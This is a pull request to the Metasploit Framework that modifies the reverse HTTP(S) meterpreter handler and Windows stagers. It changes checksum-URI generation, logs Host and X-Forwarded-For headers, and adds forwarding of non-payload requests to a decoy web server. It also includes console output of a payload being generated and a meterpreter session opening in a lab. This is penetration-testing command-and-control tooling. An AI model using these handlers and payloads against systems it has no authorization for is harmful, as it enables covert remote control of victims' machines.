### PR TITLE
Enhancements to HTTP handler communication

### DIFF
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -188,7 +188,15 @@ protected
   def on_request(cli, req, obj)
     resp = Rex::Proto::Http::Response.new
 
-    print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
+    further_information = ""
+    if req.headers["Host"]
+      further_information = " at #{req.headers['Host']}"
+    end
+    if req.headers["X-Forwarded-For"]
+      further_information = "#{further_information} via #{req.headers['X-Forwarded-For']}"
+    end
+    
+    print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}#{further_information}...")
 
     uri_match = process_uri_resource(req.relative_resource)
 

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -345,7 +345,8 @@ protected
         })
 
       else
-        print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{uri_match} #{req.inspect}...")
+        print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{uri_match}...")
+        req.inspect.split(/\n/).each { |line| vprint_status("#{cli.peerhost}:#{cli.peerport} #{line}") }
         if not datastore['HttpUnknownRequestForwardHost'] or not datastore['HttpUnknownRequestForwardPort']
           resp.code    = 200
           resp.message = "OK"

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -54,7 +54,7 @@ module ReverseHttp
         OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
         OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>'  ]),
         OptAddress.new('HttpUnknownRequestForwardHost', [ false, 'Host to forward a request to when the handler receives a request that is not from a payload, instead of answering with HttpUnknownRequestResponse']),
-        OptInt.new('HttpUnknownRequestForwardPort', [ false, 'Port to forward a request to when the handler receives a request that is not from a payload, instead of answering with HttpUnknownRequestResponse']),
+        OptInt.new('HttpUnknownRequestForwardPort', [ false, 'Port to forward a request to when the handler receives a request that is not from a payload, instead of answering with HttpUnknownRequestResponse', 80]),
       ], Msf::Handler::ReverseHttp)
   end
 
@@ -347,7 +347,7 @@ protected
       else
         print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{uri_match}...")
         req.inspect.split(/\n/).each { |line| vprint_status("#{cli.peerhost}:#{cli.peerport} #{line}") }
-        if not datastore['HttpUnknownRequestForwardHost'] or not datastore['HttpUnknownRequestForwardPort']
+        if not datastore['HttpUnknownRequestForwardHost']
           resp.code    = 200
           resp.message = "OK"
           resp.body    = datastore['HttpUnknownRequestResponse'].to_s

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -52,7 +52,9 @@ module ReverseHttp
         OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]),
         OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
         OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
-        OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>'  ])
+        OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>'  ]),
+        OptAddress.new('HttpUnknownRequestForwardHost', [ false, 'Host to forward a request to when the handler receives a request that is not from a payload, instead of answering with HttpUnknownRequestResponse']),
+        OptInt.new('HttpUnknownRequestForwardPort', [ false, 'Port to forward a request to when the handler receives a request that is not from a payload, instead of answering with HttpUnknownRequestResponse']),
       ], Msf::Handler::ReverseHttp)
   end
 
@@ -344,9 +346,22 @@ protected
 
       else
         print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{uri_match} #{req.inspect}...")
-        resp.code    = 200
-        resp.message = "OK"
-        resp.body    = datastore['HttpUnknownRequestResponse'].to_s
+        if not datastore['HttpUnknownRequestForwardHost'] or not datastore['HttpUnknownRequestForwardPort']
+          resp.code    = 200
+          resp.message = "OK"
+          resp.body    = datastore['HttpUnknownRequestResponse'].to_s
+        else
+          c = Rex::Proto::Http::Client.new( datastore['HttpUnknownRequestForwardHost'], datastore['HttpUnknownRequestForwardPort'].to_i)
+          new_req = req.clone
+          new_req.headers = req.headers.clone
+          if req.headers["X-Forwarded-For"]
+            new_req.headers["X-Forwarded-For"] = "#{req.headers['X-Forwarded-For']}, #{cli.peerhost}"
+          else
+            new_req.headers["X-Forwarded-For"] = cli.peerhost
+          end
+          
+          resp = c.send_recv(new_req)
+        end
     end
 
     cli.send_response(resp) if (resp)

--- a/lib/msf/core/handler/reverse_http/uri_checksum.rb
+++ b/lib/msf/core/handler/reverse_http/uri_checksum.rb
@@ -12,38 +12,6 @@ module Msf
         URI_CHECKSUM_INITJ = 88
         URI_CHECKSUM_CONN  = 98
 
-        #
-        # Precalculated checkums as fallback
-        #
-        URI_CHECKSUM_PRECALC = [
-            "Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp",
-            "cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt",
-            "E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby",
-            "tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563",
-            "0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg",
-            "U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E",
-            "KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2",
-            "1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ",
-            "HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg",
-            "J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1",
-            "k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5",
-            "bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I",
-            "YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ",
-            "KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC",
-            "CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ",
-            "2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5",
-            "Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi",
-            "iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP",
-            "eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA",
-            "oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL",
-            "dq5qM", "LITku", "AZIxn", "bVwPL", "jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS",
-            "BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t",
-            "7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG",
-            "kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM",
-            "aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg",
-            "zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"
-        ]
-
         # Map "random" URIs to static strings, allowing us to randomize
         # the URI sent in the first request.
         #
@@ -72,20 +40,25 @@ module Msf
 
         # Create a URI that matches a given checksum
         #
-        # @param sum [Fixnum] The checksum value you are trying to create a URI for
-        # @param length [Fixnum] The requested length of the string to be returned. Must be > 1. WARNING: Is not guaranteed to be honored.
+        # @param sum [Fixnum] The checksum value you are trying to create a URI for. Must be between 0 and 255 inclusive
+        # @param length [Fixnum] The requested length of the string to be returned. Must be > 1.
         # @return [String] The URI string that checksums to the given value
         def generate_uri_checksum(sum, length=4)
+          raise ArgumentError, "sum must be a number >= 0 and <= 255" unless sum.is_a? Fixnum and sum >= 0 and sum <= 255
+          raise ArgumentError, "length must be a number >= 1" unless length.is_a? Fixnum and length >= 1
           chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
-          32.times do
-            uri = Rex::Text.rand_text_alphanumeric(length-1)
-            chk.sort_by {rand}.each do |x|
-              return(uri + x) if Rex::Text.checksum8(uri + x) == sum
+          indices = (0..length-1).collect{ rand(chk.length) }
+          
+          loop do
+            uri = indices.collect{ |x| chk[x] }.join("")
+            return uri if Rex::Text.checksum8(uri) == sum
+            
+            # Increment indices within some lexicographic ordering
+            carry = 1
+            for i in (0..indices.length-1) do
+              carry, indices[i] = (indices[i] + carry).divmod(chk.length)
             end
           end
-
-          # Otherwise return one of the pre-calculated strings
-          return URI_CHECKSUM_PRECALC[sum]
         end
 
       end

--- a/lib/msf/core/handler/reverse_http/uri_checksum.rb
+++ b/lib/msf/core/handler/reverse_http/uri_checksum.rb
@@ -49,7 +49,7 @@ module Msf
           chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
           indices = (0..length-1).collect{ rand(chk.length) }
           
-          loop do
+          (chk.length ** indices.length).times do
             uri = indices.collect{ |x| chk[x] }.join("")
             return uri if Rex::Text.checksum8(uri) == sum
             
@@ -59,6 +59,7 @@ module Msf
               carry, indices[i] = (indices[i] + carry).divmod(chk.length)
             end
           end
+          raise RuntimeError, "all possible URIs tried, none with matchig checksum found"
         end
 
       end

--- a/lib/msf/core/handler/reverse_http/uri_checksum.rb
+++ b/lib/msf/core/handler/reverse_http/uri_checksum.rb
@@ -73,11 +73,12 @@ module Msf
         # Create a URI that matches a given checksum
         #
         # @param sum [Fixnum] The checksum value you are trying to create a URI for
+        # @param length [Fixnum] The requested length of the string to be returned. Must be > 1. WARNING: Is not guaranteed to be honored.
         # @return [String] The URI string that checksums to the given value
-        def generate_uri_checksum(sum)
+        def generate_uri_checksum(sum, length=4)
           chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
           32.times do
-            uri = Rex::Text.rand_text_alphanumeric(3)
+            uri = Rex::Text.rand_text_alphanumeric(length-1)
             chk.sort_by {rand}.each do |x|
               return(uri + x) if Rex::Text.checksum8(uri + x) == sum
             end

--- a/lib/msf/core/handler/reverse_http/uri_checksum.rb
+++ b/lib/msf/core/handler/reverse_http/uri_checksum.rb
@@ -48,9 +48,11 @@ module Msf
           raise ArgumentError, "length must be a number >= 1" unless length.is_a? Fixnum and length >= 1
           chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
           indices = (0..length-1).collect{ rand(chk.length) }
+          mask = (1 << (chk.length.to_s(2).size-1)) -1
+          mask_bytes = (0..length-1).collect{ |i| (3 * (5+i)) & mask }
           
           (chk.length ** indices.length).times do
-            uri = indices.collect{ |x| chk[x] }.join("")
+            uri = (0..length-1).collect{ |i| chk[ mask_bytes[i] ^ indices[i] ] }.join("")
             return uri if Rex::Text.checksum8(uri) == sum
             
             # Increment indices within some lexicographic ordering

--- a/modules/payloads/stagers/windows/reverse_http.rb
+++ b/modules/payloads/stagers/windows/reverse_http.rb
@@ -78,6 +78,7 @@ module Metasploit3
     p = super
     i = p.index("/12345\x00")
     u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW,5) + "\x00"
+    print_status("Notice: This payload uses #{u[0..-2]} as its first stage connection point")
     p[i, u.length] = u
 
     lhost = datastore['LHOST'] || Rex::Socket.source_address

--- a/modules/payloads/stagers/windows/reverse_http.rb
+++ b/modules/payloads/stagers/windows/reverse_http.rb
@@ -77,7 +77,7 @@ module Metasploit3
   def generate
     p = super
     i = p.index("/12345\x00")
-    u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
+    u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW,5) + "\x00"
     p[i, u.length] = u
 
     lhost = datastore['LHOST'] || Rex::Socket.source_address

--- a/modules/payloads/stagers/windows/reverse_https.rb
+++ b/modules/payloads/stagers/windows/reverse_https.rb
@@ -79,6 +79,7 @@ module Metasploit3
     p = super
     i = p.index("/12345\x00")
     u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW,5) + "\x00"
+    print_status("Notice: This payload uses #{u[0..-2]} as its first stage connection point")
     p[i, u.length] = u
     p + datastore['LHOST'].to_s + "\x00"
   end

--- a/modules/payloads/stagers/windows/reverse_https.rb
+++ b/modules/payloads/stagers/windows/reverse_https.rb
@@ -78,7 +78,7 @@ module Metasploit3
   def generate
     p = super
     i = p.index("/12345\x00")
-    u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW) + "\x00"
+    u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW,5) + "\x00"
     p[i, u.length] = u
     p + datastore['LHOST'].to_s + "\x00"
   end

--- a/modules/payloads/stagers/windows/reverse_https_proxy.rb
+++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb
@@ -77,6 +77,7 @@ module Metasploit3
 
     i = p.index("/12345\x00")
     u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttpsProxy::URI_CHECKSUM_INITW,5) + "\x00"
+    print_status("Notice: This payload uses #{u[0..-2]} as its first stage connection point")
     p[i, u.length] = u
 
     # patch proxy info

--- a/modules/payloads/stagers/windows/reverse_https_proxy.rb
+++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb
@@ -76,7 +76,7 @@ module Metasploit3
     p = super
 
     i = p.index("/12345\x00")
-    u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttpsProxy::URI_CHECKSUM_INITW) + "\x00"
+    u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttpsProxy::URI_CHECKSUM_INITW,5) + "\x00"
     p[i, u.length] = u
 
     # patch proxy info

--- a/modules/payloads/stagers/windows/x64/reverse_https.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_https.rb
@@ -104,6 +104,7 @@ module Metasploit3
     p = super
     i = p.index("/12345\x00")
     u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW,5) + "\x00"
+    print_status("Notice: This payload uses #{u[0..-2]} as its first stage connection point")
     p[i, u.length] = u
     p + datastore['LHOST'].to_s + "\x00"
   end

--- a/modules/payloads/stagers/windows/x64/reverse_https.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_https.rb
@@ -103,7 +103,7 @@ module Metasploit3
   def generate
     p = super
     i = p.index("/12345\x00")
-    u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW) + "\x00"
+    u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW,5) + "\x00"
     p[i, u.length] = u
     p + datastore['LHOST'].to_s + "\x00"
   end

--- a/spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb
+++ b/spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb
@@ -13,18 +13,24 @@ describe Msf::Handler::ReverseHttp::UriChecksum do
 
   describe '#generate_uri_checksum' do
     let(:checksum_value) { 92 }
+    let(:expected_length) { 6 }
 
     it 'generates a string that checksums back to the original value' do
       uri_string = dummy_object.generate_uri_checksum(checksum_value)
       expect(Rex::Text.checksum8(uri_string)).to eq checksum_value
     end
-
-    context 'when it fails to generate a random URI' do
-      it 'should use the pre-calculated checksum string' do
-        Rex::Text.stub(:checksum8) { false }
-        expect(dummy_object.generate_uri_checksum(checksum_value)).to eq Msf::Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_PRECALC[checksum_value]
-      end
-
+    
+    it 'generates a string that has the correct length' do
+      uri_string = dummy_object.generate_uri_checksum(checksum_value, expected_length)
+      expect(uri_string.length).to eq expected_length
+    end
+    
+    it 'generates an exception when passed a negative length' do
+      expect { dummy_object.generate_uri_checksum(checksum_value, -1) }.to raise_error(ArgumentError)
+    end
+    
+    it 'generates an exception when passed an invalid checksum' do
+      expect { dummy_object.generate_uri_checksum(256) }.to raise_error(ArgumentError)
     end
   end
 

--- a/spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb
+++ b/spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb
@@ -32,6 +32,10 @@ describe Msf::Handler::ReverseHttp::UriChecksum do
     it 'generates an exception when passed an invalid checksum' do
       expect { dummy_object.generate_uri_checksum(256) }.to raise_error(ArgumentError)
     end
+    
+    it 'generates an exception when it does not find a result' do
+      expect { dummy_object.generate_uri_checksum(2,1) }.to raise_error(RuntimeError)
+    end
   end
 
   describe '#process_uri_resource' do


### PR DESCRIPTION
While using metasploit as part of my job I found some inelegancies and missing features in the HTTP handler code (e.g. for reverse meterpreter connections), which I subsequently fixed in my local version. (Note: I am not a Ruby programmer.) I want to commit my enhancements back into the framework, not the least so that I won't get merge conflicts with future updates. My scenario includes a long-ish running HTTPS meterpreter handler with payloads being sent to different clients.
## Issues/Inelegancies
- The URI length of the initial reverse meterpreter HTTP connection is fixed to 4. The payload allows 5 bytes, and the generating function Msf::Core::Handler::ReverseHttp::UriChecksum::generate_uri_checksum() has no explicit length parameter.
- The randomization algorithm in generate_uri_checksum() is non-deterministic and may sometimes fail. This necessitates a) a retry logic and b) a fallback array of pre-computed values. The length of the pre-computed values is fixed to 5 bytes (while the normal algorithm implicitly returns 4 bytes).
## Missing features
- The URI used for a specific payload is not output by the generating functions, so it's not easy to associate a specific payload with a specific client.
- The Host: header of incoming HTTP requests (f.e. when distinguishing clients by DNS hostnames) is not output. The X-Forwarded-For: header of incoming HTTP requests (f.e. when using the handler behind a reverse proxy) is not output
- It would be nice to be able to use the HTTP handler as a reverse proxy in front of a different HTTP server, e.g. to serve static files.
# Changes
- Msf::Core::Handler::Reverse_Http::Uri_Checksum::generate_uri_checksum() is replaced with a deterministic randomization algorithm that won't fail. The fallback table is removed. A new length parameter allows callers to request a specific length (default is 4, which previously was the implicit length). The rspec tests are updated for this new behaviour.
- The reverse_http\* stagers now use the full 5 bytes of uri length for more entropy. The generated uri is output with print_status()
- The reverse_http handler gets two new options HttpUnknownRequestForwardHost and HttpUnknownRequestForwardPort to specify a HTTP server to forward to. If both are set then HttpUnknownRequestResponse is ignored and the request is instead forwarded to the specified server (setting X-Forwarded-For) and the response used as the reverse_http handler response.
- Host: and X-Forwarded-For: headers of incoming requests in the reverse_http handler are output, allowing for better understanding of where a request comes from in a complex environment.
- The dump of the full incoming HTTP request in case of an unrecognized request is now conditional on VERBOSE being set.
# Verification steps
- [x] Generate a payload/windows/meterpreter/reverse_https payload, it should a) output the uri to be used, which should b) be 5 bytes long

```
msf > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set LHOST 192.168.255.1
LHOST => 192.168.255.1
msf payload(reverse_https) > generate -t exe -f foo

[*] Notice: This payload uses /900Kx as its first stage connection point
[*] Writing 73802 bytes to foo...
```
- [x] Start a handler for windows/meterpreter/reverse_https using exploit/multi/handler with HttpUnknownRequestForwardHost/HttpUnknownRequestForwardPort set and have 1) a payload, and 2) something else (e.g. a browser) connect back to it. You should see a) the host name that the HTTP client requested, and b) for all non-meterpreter requests get the normal webserver responses

```
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LPORT 4443
LPORT => 4443
msf exploit(handler) > set LHOST 192.168.255.1
LHOST => 192.168.255.1
msf exploit(handler) > set VERBOSE true
VERBOSE => true
msf exploit(handler) > set HttpUnknownRequestForwardHost 127.0.0.1
HttpUnknownRequestForwardHost => 127.0.0.1
msf exploit(handler) > set HttpUnknownRequestForwardPort 80
HttpUnknownRequestForwardPort => 80
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j

[*] Notice: This payload uses /6AHCZ as its first stage connection point
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://0.0.0.0:4443/
[*] Starting the payload handler...
msf exploit(handler) > [*] 192.168.255.159:49429 Request received for /900Kx at 192.168.255.1:4443...
[*] 192.168.255.159:49429 Staging connection for target /900Kx received...
[*] Patched user-agent at offset 663656...
[*] Patched transport at offset 663320...
[*] Patched URL at offset 663384...
[*] Patched Expiration Timeout at offset 664256...
[*] Patched Communication Timeout at offset 664260...
[*] Meterpreter session 1 opened (192.168.255.1:4443 -> 192.168.255.159:49429) at 2014-09-09 17:39:18 +0200
[*] 127.0.0.1:44950 Request received for / at localhost:4443...
[*] 127.0.0.1:44950 Unknown request to / GET / HTTP/1.1
[*] 127.0.0.1:44950 Host: localhost:4443
[*] 127.0.0.1:44950 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:32.0) Gecko/20100101 Firefox/32.0
[*] 127.0.0.1:44950 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
[*] 127.0.0.1:44950 Accept-Language: en-GB,en;q=0.5
[*] 127.0.0.1:44950 Accept-Encoding: gzip, deflate
[*] 127.0.0.1:44950 Connection: keep-alive
[*] 127.0.0.1:44950 Content-Length: 0
[*] 127.0.0.1:44950 
[*] 127.0.0.1:44952 Request received for /favicon.ico at localhost:4443...
[*] 127.0.0.1:44952 Unknown request to /favicon.ico GET /favicon.ico HTTP/1.1
[*] 127.0.0.1:44950 Host: localhost:4443
[*] 127.0.0.1:44950 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:32.0) Gecko/20100101 Firefox/32.0
[*] 127.0.0.1:44950 Accept: image/png,image/*;q=0.8,*/*;q=0.5
[*] 127.0.0.1:44950 Accept-Language: en-GB,en;q=0.5
[*] 127.0.0.1:44950 Accept-Encoding: gzip, deflate
[*] 127.0.0.1:44950 Connection: keep-alive
[*] 127.0.0.1:44950 Content-Length: 0
[*] 127.0.0.1:44950 
[*] 127.0.0.1:44953 Request received for /favicon.ico at localhost:4443...
[*] 127.0.0.1:44953 Unknown request to /favicon.ico GET /favicon.ico HTTP/1.1
[*] 127.0.0.1:44950 Host: localhost:4443
[*] 127.0.0.1:44950 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:32.0) Gecko/20100101 Firefox/32.0
[*] 127.0.0.1:44950 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
[*] 127.0.0.1:44950 Accept-Language: en-GB,en;q=0.5
[*] 127.0.0.1:44950 Accept-Encoding: gzip, deflate
[*] 127.0.0.1:44950 Connection: keep-alive
[*] 127.0.0.1:44950 Content-Length: 0
[*] 127.0.0.1:44950 
```
